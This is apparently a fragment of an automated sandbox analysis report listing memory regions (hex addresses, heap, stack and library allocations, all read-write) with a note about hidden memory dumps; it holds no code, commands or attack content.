||
7FE89093000
|
trusted library allocation
|
page read and write
|
||
4F39000
|
heap
|
page read and write
|
||
43C5000
|
trusted library allocation
|
page read and write
|
||
4759000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
2C29000
|
trusted library allocation
|
page read and write
|
||
547000
|
heap
|
page read and write
|
||
4B7000
|
heap
|
page read and write
|
||
26FD000
|
trusted library allocation
|
page read and write
|
||
27A9000
|
trusted library allocation
|
page read and write
|
||
1FC0000
|
heap
|
page read and write
|
||
1C2C7000
|
heap
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
1A89D000
|
heap
|
page read and write
|
||
5668000
|
heap
|
page read and write
|
||
42BA000
|
heap
|
page read and write
|
||
1C2A9000
|
heap
|
page read and write
|
||
5539000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
209000
|
heap
|
page read and write
|
||
4F2F000
|
heap
|
page read and write
|
||
26ED000
|
trusted library allocation
|
page read and write
|
||
529A000
|
heap
|
page read and write
|
||
238B000
|
trusted library allocation
|
page read and write
|
||
38B000
|
heap
|
page read and write
|
||
3B10000
|
heap
|
page read and write
|
||
270B000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
528C000
|
heap
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
565E000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
1C4D8000
|
heap
|
page read and write
|
||
259D000
|
trusted library allocation
|
page read and write
|
||
1D96000
|
heap
|
page read and write
|
||
4BE000
|
stack
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
7FE893C0000
|
trusted library allocation
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
1B7BC000
|
stack
|
page read and write
|
||
385000
|
heap
|
page read and write
|
There are 1951 hidden memdumps, click here to show them.